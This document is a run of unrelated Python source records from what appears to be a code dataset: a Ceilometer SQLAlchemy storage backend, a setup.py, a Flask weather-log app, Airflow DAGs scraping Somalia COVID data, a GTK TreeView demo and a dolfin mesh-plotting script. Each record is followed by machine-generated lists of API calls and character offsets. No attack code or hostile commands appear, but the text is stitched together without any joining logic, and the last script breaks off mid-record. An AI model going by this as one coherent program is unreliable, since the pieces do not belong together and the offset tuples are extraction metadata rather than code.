[((907, 935), 'mindspore.nn.BCELoss', 'nn.BCELoss', ([], {'reduction': '"""mean"""'}), "(reduction='mean')\n", (917, 935), True, 'import mindspore.nn as nn\n'), ((955, 995), 'mindspore.ops.ReduceSum', 'mindspore.ops.ReduceSum', ([], {'keep_dims': '(False)'}), '(keep_dims=False)\n', (978, 995), False, 'import mindspore\n'), ((1954, 1982), 'mindspore.nn.BCELoss', 'nn.BCELoss', ([], {'reduction': '"""mean"""'}), "(reduction='mean')\n", (1964, 1982), True, 'import mindspore.nn as nn\n'), ((2002, 2042), 'mindspore.ops.ReduceSum', 'mindspore.ops.ReduceSum', ([], {'keep_dims': '(False)'}), '(keep_dims=False)\n', (2025, 2042), False, 'import mindspore\n')]
|
# -*- encoding: utf-8 -*-
#
# Author: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""SQLAlchemy storage backend."""
from __future__ import absolute_import
import copy
import os
from sqlalchemy import func
from ceilometer.openstack.common import log
from ceilometer.openstack.common import timeutils
from ceilometer.storage import base
from ceilometer.storage import models as api_models
from ceilometer.storage.sqlalchemy import migration
from ceilometer.storage.sqlalchemy.models import Meter, Project, Resource
from ceilometer.storage.sqlalchemy.models import Source, User, Base
import ceilometer.storage.sqlalchemy.session as sqlalchemy_session
LOG = log.getLogger(__name__)
class SQLAlchemyStorage(base.StorageEngine):
"""Put the data into a SQLAlchemy database.
Tables::
- user
- { id: user uuid }
- source
- { id: source id }
- project
- { id: project uuid }
- meter
- the raw incoming data
- { id: meter id
counter_name: counter name
user_id: user uuid (->user.id)
project_id: project uuid (->project.id)
resource_id: resource uuid (->resource.id)
resource_metadata: metadata dictionaries
counter_type: counter type
counter_unit: counter unit
counter_volume: counter volume
timestamp: datetime
message_signature: message signature
message_id: message uuid
}
- resource
- the metadata for resources
- { id: resource uuid
resource_metadata: metadata dictionaries
project_id: project uuid (->project.id)
user_id: user uuid (->user.id)
}
- sourceassoc
- the relationships
- { meter_id: meter id (->meter.id)
project_id: project uuid (->project.id)
resource_id: resource uuid (->resource.id)
user_id: user uuid (->user.id)
source_id: source id (->source.id)
}
"""
OPTIONS = []
def register_opts(self, conf):
"""Register any configuration options used by this engine."""
conf.register_opts(self.OPTIONS)
@staticmethod
def get_connection(conf):
"""Return a Connection instance based on the configuration settings.
"""
return Connection(conf)
def make_query_from_filter(query, event_filter, require_meter=True):
"""Return a query dictionary based on the settings in the filter.
:param filter: EventFilter instance
:param require_meter: If true and the filter does not have a meter,
raise an error.
"""
if event_filter.meter:
query = query.filter(Meter.counter_name == event_filter.meter)
elif require_meter:
raise RuntimeError('Missing required meter specifier')
if event_filter.source:
query = query.filter(Meter.sources.any(id=event_filter.source))
if event_filter.start:
ts_start = event_filter.start
query = query.filter(Meter.timestamp >= ts_start)
if event_filter.end:
ts_end = event_filter.end
query = query.filter(Meter.timestamp < ts_end)
if event_filter.user:
query = query.filter_by(user_id=event_filter.user)
if event_filter.project:
query = query.filter_by(project_id=event_filter.project)
if event_filter.resource:
query = query.filter_by(resource_id=event_filter.resource)
if event_filter.metaquery:
raise NotImplementedError('metaquery not implemented')
return query
class Connection(base.Connection):
"""SqlAlchemy connection."""
def __init__(self, conf):
url = conf.database_connection
if url == 'sqlite://':
url = os.environ.get('CEILOMETER_TEST_SQL_URL', url)
LOG.info('connecting to %s', url)
self.session = sqlalchemy_session.get_session(url, conf)
def upgrade(self, version=None):
migration.db_sync(self.session.get_bind(), version=version)
def clear(self):
engine = self.session.get_bind()
for table in reversed(Base.metadata.sorted_tables):
engine.execute(table.delete())
def record_metering_data(self, data):
"""Write the data to the backend storage system.
:param data: a dictionary such as returned by
ceilometer.meter.meter_message_from_counter
"""
if data['source']:
source = self.session.query(Source).get(data['source'])
if not source:
source = Source(id=data['source'])
self.session.add(source)
else:
source = None
# create/update user && project, add/update their sources list
if data['user_id']:
user = self.session.merge(User(id=str(data['user_id'])))
if not filter(lambda x: x.id == source.id, user.sources):
user.sources.append(source)
else:
user = None
if data['project_id']:
project = self.session.merge(Project(id=str(data['project_id'])))
if not filter(lambda x: x.id == source.id, project.sources):
project.sources.append(source)
else:
project = None
# Record the updated resource metadata
rmetadata = data['resource_metadata']
resource = self.session.merge(Resource(id=str(data['resource_id'])))
if not filter(lambda x: x.id == source.id, resource.sources):
resource.sources.append(source)
resource.project = project
resource.user = user
# Current metadata being used and when it was last updated.
resource.resource_metadata = rmetadata
# autoflush didn't catch this one, requires manual flush
self.session.flush()
# Record the raw data for the event.
meter = Meter(counter_type=data['counter_type'],
counter_unit=data['counter_unit'],
counter_name=data['counter_name'], resource=resource)
self.session.add(meter)
if not filter(lambda x: x.id == source.id, meter.sources):
meter.sources.append(source)
meter.project = project
meter.user = user
meter.timestamp = data['timestamp']
meter.resource_metadata = rmetadata
meter.counter_volume = data['counter_volume']
meter.message_signature = data['message_signature']
meter.message_id = data['message_id']
return
def get_users(self, source=None):
"""Return an iterable of user id strings.
:param source: Optional source filter.
"""
query = self.session.query(User.id)
if source is not None:
query = query.filter(User.sources.any(id=source))
return (x[0] for x in query.all())
def get_projects(self, source=None):
"""Return an iterable of project id strings.
:param source: Optional source filter.
"""
query = self.session.query(Project.id)
if source:
query = query.filter(Project.sources.any(id=source))
return (x[0] for x in query.all())
def get_resources(self, user=None, project=None, source=None,
start_timestamp=None, end_timestamp=None,
metaquery={}, resource=None):
"""Return an iterable of api_models.Resource instances
:param user: Optional ID for user that owns the resource.
:param project: Optional ID for project that owns the resource.
:param source: Optional source filter.
:param start_timestamp: Optional modified timestamp start range.
:param end_timestamp: Optional modified timestamp end range.
:param metaquery: Optional dict with metadata to match on.
:param resource: Optional resource filter.
"""
query = self.session.query(Meter,).group_by(Meter.resource_id)
if user is not None:
query = query.filter(Meter.user_id == user)
if source is not None:
query = query.filter(Meter.sources.any(id=source))
if start_timestamp:
query = query.filter(Meter.timestamp >= start_timestamp)
if end_timestamp:
query = query.filter(Meter.timestamp < end_timestamp)
if project is not None:
query = query.filter(Meter.project_id == project)
if resource is not None:
query = query.filter(Meter.resource_id == resource)
if metaquery:
raise NotImplementedError('metaquery not implemented')
for meter in query.all():
yield api_models.Resource(
resource_id=meter.resource_id,
project_id=meter.project_id,
user_id=meter.user_id,
metadata=meter.resource_metadata,
meter=[
api_models.ResourceMeter(
counter_name=m.counter_name,
counter_type=m.counter_type,
counter_unit=m.counter_unit,
)
for m in meter.resource.meters
],
)
def get_meters(self, user=None, project=None, resource=None, source=None,
metaquery={}):
"""Return an iterable of api_models.Meter instances
:param user: Optional ID for user that owns the resource.
:param project: Optional ID for project that owns the resource.
:param resource: Optional ID of the resource.
:param source: Optional source filter.
:param metaquery: Optional dict with metadata to match on.
"""
query = self.session.query(Resource)
if user is not None:
query = query.filter(Resource.user_id == user)
if source is not None:
query = query.filter(Resource.sources.any(id=source))
if resource:
query = query.filter(Resource.id == resource)
if project is not None:
query = query.filter(Resource.project_id == project)
query = query.options(
sqlalchemy_session.sqlalchemy.orm.joinedload('meters'))
if metaquery:
raise NotImplementedError('metaquery not implemented')
for resource in query.all():
meter_names = set()
for meter in resource.meters:
if meter.counter_name in meter_names:
continue
meter_names.add(meter.counter_name)
yield api_models.Meter(
name=meter.counter_name,
type=meter.counter_type,
unit=meter.counter_unit,
resource_id=resource.id,
project_id=resource.project_id,
user_id=resource.user_id,
)
def get_samples(self, event_filter):
"""Return an iterable of api_models.Samples
"""
query = self.session.query(Meter)
query = make_query_from_filter(query, event_filter,
require_meter=False)
samples = query.all()
for s in samples:
# Remove the id generated by the database when
# the event was inserted. It is an implementation
# detail that should not leak outside of the driver.
yield api_models.Sample(
# Replace 'sources' with 'source' to meet the caller's
# expectation, Meter.sources contains one and only one
# source in the current implementation.
source=s.sources[0].id,
counter_name=s.counter_name,
counter_type=s.counter_type,
counter_unit=s.counter_unit,
counter_volume=s.counter_volume,
user_id=s.user_id,
project_id=s.project_id,
resource_id=s.resource_id,
timestamp=s.timestamp,
resource_metadata=s.resource_metadata,
message_id=s.message_id,
message_signature=s.message_signature,
)
def _make_volume_query(self, event_filter, counter_volume_func):
"""Returns complex Meter counter_volume query for max and sum."""
subq = self.session.query(Meter.id)
subq = make_query_from_filter(subq, event_filter, require_meter=False)
subq = subq.subquery()
mainq = self.session.query(Resource.id, counter_volume_func)
mainq = mainq.join(Meter).group_by(Resource.id)
return mainq.filter(Meter.id.in_(subq))
def get_event_interval(self, event_filter):
"""Return the min and max timestamps from samples,
using the event_filter to limit the samples seen.
( datetime.datetime(), datetime.datetime() )
"""
query = self.session.query(func.min(Meter.timestamp),
func.max(Meter.timestamp))
query = make_query_from_filter(query, event_filter)
results = query.all()
a_min, a_max = results[0]
return (a_min, a_max)
def _make_stats_query(self, event_filter):
query = self.session.query(
func.min(Meter.timestamp).label('tsmin'),
func.max(Meter.timestamp).label('tsmax'),
func.avg(Meter.counter_volume).label('avg'),
func.sum(Meter.counter_volume).label('sum'),
func.min(Meter.counter_volume).label('min'),
func.max(Meter.counter_volume).label('max'),
func.count(Meter.counter_volume).label('count'))
return make_query_from_filter(query, event_filter)
@staticmethod
def _stats_result_to_model(result, period, period_start, period_end):
duration = (timeutils.delta_seconds(result.tsmin, result.tsmax)
if result.tsmin is not None and result.tsmax is not None
else None)
return api_models.Statistics(
count=int(result.count),
min=result.min,
max=result.max,
avg=result.avg,
sum=result.sum,
duration_start=result.tsmin,
duration_end=result.tsmax,
duration=duration,
period=period,
period_start=period_start,
period_end=period_end,
)
def get_meter_statistics(self, event_filter, period=None):
"""Return an iterable of api_models.Statistics instances containing
meter statistics described by the query parameters.
The filter must have a meter value set.
"""
if not period or not event_filter.start or not event_filter.end:
res = self._make_stats_query(event_filter).all()[0]
if not period:
yield self._stats_result_to_model(res, 0, res.tsmin, res.tsmax)
return
query = self._make_stats_query(event_filter)
# HACK(jd) This is an awful method to compute stats by period, but
# since we're trying to be SQL agnostic we have to write portable
# code, so here it is, admire! We're going to do one request to get
# stats by period. We would like to use GROUP BY, but there's no
# portable way to manipulate timestamp in SQL, so we can't.
for period_start, period_end in base.iter_period(
event_filter.start or res.tsmin,
event_filter.end or res.tsmax,
period):
q = query.filter(Meter.timestamp >= period_start)
q = q.filter(Meter.timestamp < period_end)
r = q.all()[0]
# Don't return results that didn't have any event
if r.count:
yield self._stats_result_to_model(
result=r,
period=int(timeutils.delta_seconds(period_start,
period_end)),
period_start=period_start,
period_end=period_end,
)
|
[
"sqlalchemy.func.sum",
"ceilometer.storage.sqlalchemy.models.Meter.sources.any",
"ceilometer.openstack.common.timeutils.delta_seconds",
"ceilometer.storage.sqlalchemy.models.Meter",
"ceilometer.storage.sqlalchemy.session.get_session",
"ceilometer.storage.sqlalchemy.models.Resource.sources.any",
"ceilometer.storage.sqlalchemy.models.User.sources.any",
"ceilometer.storage.base.iter_period",
"sqlalchemy.func.min",
"ceilometer.storage.models.ResourceMeter",
"ceilometer.storage.sqlalchemy.models.Meter.id.in_",
"sqlalchemy.func.avg",
"ceilometer.storage.sqlalchemy.models.Project.sources.any",
"sqlalchemy.func.max",
"ceilometer.openstack.common.log.getLogger",
"ceilometer.storage.models.Sample",
"ceilometer.storage.sqlalchemy.session.sqlalchemy.orm.joinedload",
"ceilometer.storage.sqlalchemy.models.Source",
"ceilometer.storage.models.Meter",
"os.environ.get",
"sqlalchemy.func.count"
] |
[((1206, 1229), 'ceilometer.openstack.common.log.getLogger', 'log.getLogger', (['__name__'], {}), '(__name__)\n', (1219, 1229), False, 'from ceilometer.openstack.common import log\n'), ((4592, 4633), 'ceilometer.storage.sqlalchemy.session.get_session', 'sqlalchemy_session.get_session', (['url', 'conf'], {}), '(url, conf)\n', (4622, 4633), True, 'import ceilometer.storage.sqlalchemy.session as sqlalchemy_session\n'), ((6605, 6738), 'ceilometer.storage.sqlalchemy.models.Meter', 'Meter', ([], {'counter_type': "data['counter_type']", 'counter_unit': "data['counter_unit']", 'counter_name': "data['counter_name']", 'resource': 'resource'}), "(counter_type=data['counter_type'], counter_unit=data['counter_unit'],\n counter_name=data['counter_name'], resource=resource)\n", (6610, 6738), False, 'from ceilometer.storage.sqlalchemy.models import Meter, Project, Resource\n'), ((16056, 16149), 'ceilometer.storage.base.iter_period', 'base.iter_period', (['(event_filter.start or res.tsmin)', '(event_filter.end or res.tsmax)', 'period'], {}), '(event_filter.start or res.tsmin, event_filter.end or res.\n tsmax, period)\n', (16072, 16149), False, 'from ceilometer.storage import base\n'), ((3622, 3663), 'ceilometer.storage.sqlalchemy.models.Meter.sources.any', 'Meter.sources.any', ([], {'id': 'event_filter.source'}), '(id=event_filter.source)\n', (3639, 3663), False, 'from ceilometer.storage.sqlalchemy.models import Meter, Project, Resource\n'), ((4480, 4526), 'os.environ.get', 'os.environ.get', (['"""CEILOMETER_TEST_SQL_URL"""', 'url'], {}), "('CEILOMETER_TEST_SQL_URL', url)\n", (4494, 4526), False, 'import os\n'), ((10853, 10907), 'ceilometer.storage.sqlalchemy.session.sqlalchemy.orm.joinedload', 'sqlalchemy_session.sqlalchemy.orm.joinedload', (['"""meters"""'], {}), "('meters')\n", (10897, 10907), True, 'import ceilometer.storage.sqlalchemy.session as sqlalchemy_session\n'), ((13325, 13343), 'ceilometer.storage.sqlalchemy.models.Meter.id.in_', 'Meter.id.in_', (['subq'], {}), '(subq)\n', (13337, 13343), False, 'from ceilometer.storage.sqlalchemy.models import Meter, Project, Resource\n'), ((13612, 13637), 'sqlalchemy.func.min', 'func.min', (['Meter.timestamp'], {}), '(Meter.timestamp)\n', (13620, 13637), False, 'from sqlalchemy import func\n'), ((13674, 13699), 'sqlalchemy.func.max', 'func.max', (['Meter.timestamp'], {}), '(Meter.timestamp)\n', (13682, 13699), False, 'from sqlalchemy import func\n'), ((14509, 14560), 'ceilometer.openstack.common.timeutils.delta_seconds', 'timeutils.delta_seconds', (['result.tsmin', 'result.tsmax'], {}), '(result.tsmin, result.tsmax)\n', (14532, 14560), False, 'from ceilometer.openstack.common import timeutils\n'), ((5285, 5310), 'ceilometer.storage.sqlalchemy.models.Source', 'Source', ([], {'id': "data['source']"}), "(id=data['source'])\n", (5291, 5310), False, 'from ceilometer.storage.sqlalchemy.models import Source, User, Base\n'), ((7498, 7525), 'ceilometer.storage.sqlalchemy.models.User.sources.any', 'User.sources.any', ([], {'id': 'source'}), '(id=source)\n', (7514, 7525), False, 'from ceilometer.storage.sqlalchemy.models import Source, User, Base\n'), ((7824, 7854), 'ceilometer.storage.sqlalchemy.models.Project.sources.any', 'Project.sources.any', ([], {'id': 'source'}), '(id=source)\n', (7843, 7854), False, 'from ceilometer.storage.sqlalchemy.models import Meter, Project, Resource\n'), ((8823, 8851), 'ceilometer.storage.sqlalchemy.models.Meter.sources.any', 'Meter.sources.any', ([], {'id': 'source'}), '(id=source)\n', (8840, 8851), False, 'from ceilometer.storage.sqlalchemy.models import Meter, Project, Resource\n'), ((10601, 10632), 'ceilometer.storage.sqlalchemy.models.Resource.sources.any', 'Resource.sources.any', ([], {'id': 'source'}), '(id=source)\n', (10621, 10632), False, 'from ceilometer.storage.sqlalchemy.models import Meter, Project, Resource\n'), ((12110, 12489), 'ceilometer.storage.models.Sample', 'api_models.Sample', ([], {'source': 's.sources[0].id', 'counter_name': 's.counter_name', 'counter_type': 's.counter_type', 'counter_unit': 's.counter_unit', 'counter_volume': 's.counter_volume', 'user_id': 's.user_id', 'project_id': 's.project_id', 'resource_id': 's.resource_id', 'timestamp': 's.timestamp', 'resource_metadata': 's.resource_metadata', 'message_id': 's.message_id', 'message_signature': 's.message_signature'}), '(source=s.sources[0].id, counter_name=s.counter_name,\n counter_type=s.counter_type, counter_unit=s.counter_unit,\n counter_volume=s.counter_volume, user_id=s.user_id, project_id=s.\n project_id, resource_id=s.resource_id, timestamp=s.timestamp,\n resource_metadata=s.resource_metadata, message_id=s.message_id,\n message_signature=s.message_signature)\n', (12127, 12489), True, 'from ceilometer.storage import models as api_models\n'), ((11267, 11451), 'ceilometer.storage.models.Meter', 'api_models.Meter', ([], {'name': 'meter.counter_name', 'type': 'meter.counter_type', 'unit': 'meter.counter_unit', 'resource_id': 'resource.id', 'project_id': 'resource.project_id', 'user_id': 'resource.user_id'}), '(name=meter.counter_name, type=meter.counter_type, unit=\n meter.counter_unit, resource_id=resource.id, project_id=resource.\n project_id, user_id=resource.user_id)\n', (11283, 11451), True, 'from ceilometer.storage import models as api_models\n'), ((13951, 13976), 'sqlalchemy.func.min', 'func.min', (['Meter.timestamp'], {}), '(Meter.timestamp)\n', (13959, 13976), False, 'from sqlalchemy import func\n'), ((14005, 14030), 'sqlalchemy.func.max', 'func.max', (['Meter.timestamp'], {}), '(Meter.timestamp)\n', (14013, 14030), False, 'from sqlalchemy import func\n'), ((14059, 14089), 'sqlalchemy.func.avg', 'func.avg', (['Meter.counter_volume'], {}), '(Meter.counter_volume)\n', (14067, 14089), False, 'from sqlalchemy import func\n'), ((14116, 14146), 'sqlalchemy.func.sum', 'func.sum', (['Meter.counter_volume'], {}), '(Meter.counter_volume)\n', (14124, 14146), False, 'from sqlalchemy import func\n'), ((14173, 14203), 'sqlalchemy.func.min', 'func.min', (['Meter.counter_volume'], {}), '(Meter.counter_volume)\n', (14181, 14203), False, 'from sqlalchemy import func\n'), ((14230, 14260), 'sqlalchemy.func.max', 'func.max', (['Meter.counter_volume'], {}), '(Meter.counter_volume)\n', (14238, 14260), False, 'from sqlalchemy import func\n'), ((14287, 14319), 'sqlalchemy.func.count', 'func.count', (['Meter.counter_volume'], {}), '(Meter.counter_volume)\n', (14297, 14319), False, 'from sqlalchemy import func\n'), ((9621, 9737), 'ceilometer.storage.models.ResourceMeter', 'api_models.ResourceMeter', ([], {'counter_name': 'm.counter_name', 'counter_type': 'm.counter_type', 'counter_unit': 'm.counter_unit'}), '(counter_name=m.counter_name, counter_type=m.\n counter_type, counter_unit=m.counter_unit)\n', (9645, 9737), True, 'from ceilometer.storage import models as api_models\n'), ((16537, 16586), 'ceilometer.openstack.common.timeutils.delta_seconds', 'timeutils.delta_seconds', (['period_start', 'period_end'], {}), '(period_start, period_end)\n', (16560, 16586), False, 'from ceilometer.openstack.common import timeutils\n')]
|
from setuptools import setup, find_packages
with open('README.md') as f:
readme = f.read()
setup(
name='plaza_routing',
version='0.0.1',
description='Plaza routing service for plazaroute',
long_description=readme,
author='<NAME>, <NAME>',
author_email='<EMAIL>',
url='https://github.com/PlazaRoute/plazaroute',
license="MIT License",
packages=find_packages(exclude=('tests', 'docs')),
package_data={'': ['integration/routing_strategy/graphhopper_swagger.json']}
)
|
[
"setuptools.find_packages"
] |
[((387, 427), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "('tests', 'docs')"}), "(exclude=('tests', 'docs'))\n", (400, 427), False, 'from setuptools import setup, find_packages\n')]
|
from flask import Flask, render_template, request, url_for
from datetime import datetime
from readWeather import readWeather
app = Flask(__name__)
@app.route("/", methods=['GET', 'POST'])
def print_form():
now = datetime.now()
timeString = now.strftime("%Y-%m-%d %H:%M")
templateData = {
'title' : 'Humidity and Temperature Log',
'time' : timeString
}
if request.method == 'POST':
readW = readWeather('humidity_temp_log.h5')
result=request.form['fooput']
readW.generatePlot(result)
filename1 = 'temp_humid_' + result + '.png'
return render_template('form.html',result=result, filename1=filename1, **templateData)
if request.method == 'GET':
#filename1 = 'temp.png'
return render_template("form.html", **templateData)
if __name__ == "__main__":
#app.run(host='0.0.0.0', debug=True)
app.run(host='192.168.0.24', port=5000, debug=False)
|
[
"flask.Flask",
"datetime.datetime.now",
"readWeather.readWeather",
"flask.render_template"
] |
[((131, 146), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (136, 146), False, 'from flask import Flask, render_template, request, url_for\n'), ((219, 233), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (231, 233), False, 'from datetime import datetime\n'), ((448, 483), 'readWeather.readWeather', 'readWeather', (['"""humidity_temp_log.h5"""'], {}), "('humidity_temp_log.h5')\n", (459, 483), False, 'from readWeather import readWeather\n'), ((624, 709), 'flask.render_template', 'render_template', (['"""form.html"""'], {'result': 'result', 'filename1': 'filename1'}), "('form.html', result=result, filename1=filename1, **templateData\n )\n", (639, 709), False, 'from flask import Flask, render_template, request, url_for\n'), ((783, 827), 'flask.render_template', 'render_template', (['"""form.html"""'], {}), "('form.html', **templateData)\n", (798, 827), False, 'from flask import Flask, render_template, request, url_for\n')]
|
from datetime import datetime
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.python_operator import PythonOperator
from somalia.form.main import main
from somalia.form.somalia_form_data import run_form_data_scraping
from somalia.gsheets.somalia_sheet import main
from utils.dags import default_args
from utils.debugger import enable_cloud_debugger
enable_cloud_debugger()
####################
# CONFIRMED SCRIPT #
####################
somalia_confirmed_data_dag = DAG(
dag_id='somalia-confirmed',
start_date=datetime(2020, 4, 22),
schedule_interval='15 4,16 * * *', # 15 minutes past hour 4 and 16.
default_args=default_args,
catchup=True
)
echo_confirmed = BashOperator(
task_id='Echo',
bash_command='echo "Getting Somalia Confirmed Data"'
)
run_confirmed_service = PythonOperator(
task_id='get_somalia_confirmed_data',
python_callable=main,
dag=somalia_confirmed_data_dag
)
####################
# FORM SCRIPT #
####################
somalia_form_data_dag = DAG(
dag_id='somalia-form',
start_date=datetime(2020, 4, 25),
schedule_interval='0 * * * *', # every hour
default_args=default_args,
catchup=True
)
echo_form = BashOperator(
task_id='Echo',
bash_command='echo "Getting Somalia Form Data"'
)
run_form_service = PythonOperator(
task_id='get_somalia_form_data',
python_callable=run_form_data_scraping,
dag=somalia_form_data_dag
)
####################
# SHEETS SCRIPT #
####################
somalia_sheets_upload = DAG(
dag_id='somalia-sheets-upload',
start_date=datetime(2020, 4, 25),
schedule_interval='5 * * * *', # 5 minutes past every hour
default_args=default_args,
catchup=True
)
echo_sheet = BashOperator(
task_id='Echo',
bash_command='echo "Getting Somalia Form Data"'
)
upload_sheet = PythonOperator(
task_id='upload-to-sheets',
python_callable=main,
dag=somalia_sheets_upload
)
# Three separate DAGs since none are dependant on the other
# Start times are offset to not overload the instances
echo_confirmed >> run_confirmed_service
echo_form >> run_form_service
echo_sheet >> upload_sheet
|
[
"airflow.operators.bash_operator.BashOperator",
"utils.debugger.enable_cloud_debugger",
"airflow.operators.python_operator.PythonOperator",
"datetime.datetime"
] |
[((409, 432), 'utils.debugger.enable_cloud_debugger', 'enable_cloud_debugger', ([], {}), '()\n', (430, 432), False, 'from utils.debugger import enable_cloud_debugger\n'), ((743, 830), 'airflow.operators.bash_operator.BashOperator', 'BashOperator', ([], {'task_id': '"""Echo"""', 'bash_command': '"""echo "Getting Somalia Confirmed Data\\""""'}), '(task_id=\'Echo\', bash_command=\n \'echo "Getting Somalia Confirmed Data"\')\n', (755, 830), False, 'from airflow.operators.bash_operator import BashOperator\n'), ((861, 971), 'airflow.operators.python_operator.PythonOperator', 'PythonOperator', ([], {'task_id': '"""get_somalia_confirmed_data"""', 'python_callable': 'main', 'dag': 'somalia_confirmed_data_dag'}), "(task_id='get_somalia_confirmed_data', python_callable=main,\n dag=somalia_confirmed_data_dag)\n", (875, 971), False, 'from airflow.operators.python_operator import PythonOperator\n'), ((1252, 1329), 'airflow.operators.bash_operator.BashOperator', 'BashOperator', ([], {'task_id': '"""Echo"""', 'bash_command': '"""echo "Getting Somalia Form Data\\""""'}), '(task_id=\'Echo\', bash_command=\'echo "Getting Somalia Form Data"\')\n', (1264, 1329), False, 'from airflow.operators.bash_operator import BashOperator\n'), ((1360, 1479), 'airflow.operators.python_operator.PythonOperator', 'PythonOperator', ([], {'task_id': '"""get_somalia_form_data"""', 'python_callable': 'run_form_data_scraping', 'dag': 'somalia_form_data_dag'}), "(task_id='get_somalia_form_data', python_callable=\n run_form_data_scraping, dag=somalia_form_data_dag)\n", (1374, 1479), False, 'from airflow.operators.python_operator import PythonOperator\n'), ((1784, 1861), 'airflow.operators.bash_operator.BashOperator', 'BashOperator', ([], {'task_id': '"""Echo"""', 'bash_command': '"""echo "Getting Somalia Form Data\\""""'}), '(task_id=\'Echo\', bash_command=\'echo "Getting Somalia Form Data"\')\n', (1796, 1861), False, 'from airflow.operators.bash_operator import BashOperator\n'), ((1888, 1984), 'airflow.operators.python_operator.PythonOperator', 'PythonOperator', ([], {'task_id': '"""upload-to-sheets"""', 'python_callable': 'main', 'dag': 'somalia_sheets_upload'}), "(task_id='upload-to-sheets', python_callable=main, dag=\n somalia_sheets_upload)\n", (1902, 1984), False, 'from airflow.operators.python_operator import PythonOperator\n'), ((579, 600), 'datetime.datetime', 'datetime', (['(2020)', '(4)', '(22)'], {}), '(2020, 4, 22)\n', (587, 600), False, 'from datetime import datetime\n'), ((1117, 1138), 'datetime.datetime', 'datetime', (['(2020)', '(4)', '(25)'], {}), '(2020, 4, 25)\n', (1125, 1138), False, 'from datetime import datetime\n'), ((1633, 1654), 'datetime.datetime', 'datetime', (['(2020)', '(4)', '(25)'], {}), '(2020, 4, 25)\n', (1641, 1654), False, 'from datetime import datetime\n')]
|
# -*- coding: utf-8 -*-
"""Gtk.TreeView(), Gtk.TreeStore()."""
import gi
gi.require_version(namespace='Gtk', version='3.0')
from gi.repository import Gtk
class Handler:
brazilian_cities = {
'SP': ['Botucatu', 'São Manuel'],
'SC': ['Florianópolis', 'Joinville']
}
def __init__(self):
# Acessando o `Gtk.ListStore()`.
tree_store = builder.get_object(name='tree_store')
for state, cities_list in self.brazilian_cities.items():
iter = tree_store.append(parent=None, row=[state])
for city in cities_list:
tree_store.append(parent=iter, row=[city])
def on_row_double_click(self, widget, tree_path, tree_view_column):
model = widget.get_model()
print(model)
tree_iter = model.get_iter(tree_path)
print(tree_iter)
column = tree_view_column.get_sort_column_id()
print(column)
column_title = tree_view_column.get_title()
print(column_title)
print(f'Coluna: {column} - Título: {column_title}')
value = model.get_value(iter=tree_iter, column=column)
print(f'Texto da linha {value}')
if __name__ == '__main__':
builder = Gtk.Builder.new()
builder.add_from_file(filename='MainWindow.glade')
builder.connect_signals(obj_or_map=Handler())
win = builder.get_object(name='MainWindow')
win.connect('destroy', Gtk.main_quit)
win.show_all()
Gtk.main()
|
[
"gi.repository.Gtk.Builder.new",
"gi.require_version",
"gi.repository.Gtk.main"
] |
[((75, 125), 'gi.require_version', 'gi.require_version', ([], {'namespace': '"""Gtk"""', 'version': '"""3.0"""'}), "(namespace='Gtk', version='3.0')\n", (93, 125), False, 'import gi\n'), ((1207, 1224), 'gi.repository.Gtk.Builder.new', 'Gtk.Builder.new', ([], {}), '()\n', (1222, 1224), False, 'from gi.repository import Gtk\n'), ((1444, 1454), 'gi.repository.Gtk.main', 'Gtk.main', ([], {}), '()\n', (1452, 1454), False, 'from gi.repository import Gtk\n')]
|
# -*- coding: utf-8; -*-
import pathlib
import matplotlib.pyplot as plt
import dolfin
from extrafeathers import meshfunction
from extrafeathers import meshiowrapper
from extrafeathers import plotmagic
print(pathlib.Path.cwd())
meshiowrapper.import_gmsh(src="demo/meshes/box.msh",
dst="demo/meshes/box.h5") # for use by the flow solvers
mesh, domain_parts, boundary_parts = meshiowrapper.read_hdf5_mesh("demo/meshes/box.h5")
# Visualize the fluid mesh
plt.figure(1)
plt.clf()
# mesh itself
plt.subplot(2, 2, 1)
dolfin.plot(mesh)
plt.ylabel("Mesh")
# local mesh size
plt.subplot(2, 2, 2)
theplot = dolfin.plot(meshfunction.meshsize(mesh))
plt.colorbar(theplot)
plt.ylabel("Local mesh size")
# domain parts (subdomains)
plt.subplot(2, 2, 3)
theplot = dolfin.plot(domain_parts)
plt.colorbar(theplot)
plt.ylabel("Phys. surfaces")
# boundary parts
plt.subplot(2, 2, 4)
plotmagic.plot_facet_meshfunction(boundary_parts, invalid_values=[2**64 - 1])
plt.axis("scaled")
plt.legend(loc="best")
plt.ylabel("Phys. boundaries")
plt.suptitle("Structure")
plt.show()
|
[
"extrafeathers.meshiowrapper.import_gmsh",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.show",
"extrafeathers.plotmagic.plot_facet_meshfunction",
"matplotlib.pyplot.clf",
"matplotlib.pyplot.suptitle",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.axis",
"dolfin.plot",
"matplotlib.pyplot.colorbar",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.ylabel",
"pathlib.Path.cwd",
"extrafeathers.meshfunction.meshsize",
"extrafeathers.meshiowrapper.read_hdf5_mesh"
] |
